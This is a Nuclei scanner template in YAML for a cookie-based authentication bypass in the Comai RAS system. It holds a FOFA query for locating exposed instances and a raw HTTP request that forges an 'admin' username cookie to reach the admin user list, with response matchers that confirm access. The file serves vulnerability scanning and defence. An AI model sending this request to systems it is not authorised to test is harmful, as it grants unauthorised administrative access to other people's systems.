39 lines
1.2 KiB
YAML
Executable File
39 lines
1.2 KiB
YAML
Executable File
id: comai-ras-cookie-bypass
|
|
|
|
info:
|
|
name: Comai RAS System Cookie - Authentication Override
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
Comai RAS system has cookie authentication overreach, when RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed
|
|
reference:
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/maike-ras-cookie-bypass.yaml
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: app="科迈-RAS系统"
|
|
verified: true
|
|
tags: comai-ras,ras,kemai
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /Server/CmxUser.php?pgid=UserList HTTP/1.1
|
|
Host: {{Hostname}}
|
|
cookie: RAS_Admin_UserInfo_UserName=admin
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "\"?pgid=User_Show"
|
|
- "usingeKey"
|
|
- "MachineAmount"
|
|
- "AppLoginType"
|
|
- "TimeType"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |